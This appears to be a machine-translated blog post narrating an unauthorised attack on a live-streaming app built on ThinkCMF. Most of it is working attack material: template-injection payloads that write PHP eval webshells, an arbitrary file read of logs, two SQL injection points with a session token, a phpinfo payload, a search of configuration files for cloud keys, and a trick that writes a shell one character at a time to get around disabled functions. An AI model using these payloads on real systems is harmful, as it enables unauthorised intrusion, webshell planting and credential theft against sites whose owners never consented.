Title: Record the penetration of a certain color X live broadcast APP once

Posted April 10Apr 10

On a sunny night, I was excited to walk on Twitter, and suddenly I found that the following recommended follow is such a business card of xxxx video.

This, this, this, this, I am a serious person, I don’t know why Twitter pushed these to me. This must be done, open the promotion link, and download the app.

This app gives people a familiar smell as soon as it is opened. It seems that it is likely that it is opened by TP two.

I caught the packet and obtained the url and found that this was just thinkcmf? I smiled lewdly and thought that I wouldn't have taken it off. There were so many rces at the front desk, even if there were dogs, I could do it in seconds. However, I was quickly slapped in the face by reality.

Execute POC:payload1:

/index.php?g=apim=Oautha=fetchcontent=phpfile_put_contents('pass.php','?php @eval($_POST[1]);')/php

payload2:

/?a=fetch;templateFile=public/indexprefix=''content=phpfile_put_contents('pass.php','?php@eval($_POST[1]);')/php

payload3:

?a=displaytemplateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();%3E and read any file:

/?a=displaytemplateFile=data/runtime/Logs/Portal/YY_MM_DD.log Finally, a m.php one-sentence Trojan file will be generated in the directory, and of course it can also be written as other payloads.

The operation is as fierce as a tiger, and when you look at the file 404, will it be cold?

Don't worry, in addition, this app also has SQL injection : injection point 1:

/index.php?g=Appapim=Videovideoid=1

Injection point 2:

/index.php?g=Appapim=Autha=indexuid=128889token=b69cda34dff2fa978a94b5583e7f5c9a

The injection is also cool. It seems that I want me to take out the 0day rhythm? Forget it, let's bear it. After some research, the details will not be posted, and a thousand words are omitted here. It's all about tears if you say too much. Finally, phpinfo was released, with payload above version 7.2:

/?a=fetchcontent=?=phpinfo();exit();This is not a step closer to the shell, and then see that disable_functions is disabled so many.

I tried writing using the assert function here, and thought it was done, but the result was still returned 1

@assert function does not work, here you can try to read file file_get_contents and read database configuration file

When I continued to read the config.php file, I suddenly remembered that when I downloaded the app, it was placed in Alibaba Cloud Oss. It is logical that its configuration file should have Alibaba Cloud key and id, but the reality is so cruel after all, that I didn't even see the letters aliyun.

There is nothing to read in some configuration files, and the database and redis cannot be connected externally. So I plan to write a shell and flip it carefully, and try to use file_put_contents to read the file.

It seems not possible. Is it because of a parameter problem? File_get_contents can read any file, or the directory cannot be written? Trying to write it in /tmp/1.txt also reported the same error. I thought that php also needs other functions to write files, so w3school flipped

Write 123 to i.txt, and successfully write the file

Try to write a sentence to php, and it prompts that the template does not exist. What should I do? I saw that the shell was obtained. Look carefully at the fwrite parameter. W+ is to open write and r+ is to append. Do I want to write one character by one? That's right, it's just to write one character to one character.a=fetchcontent=%3C?=@$fp=fopen(%221.php%22,%27a+%27);%20fwrite($fp,%27%27);exit();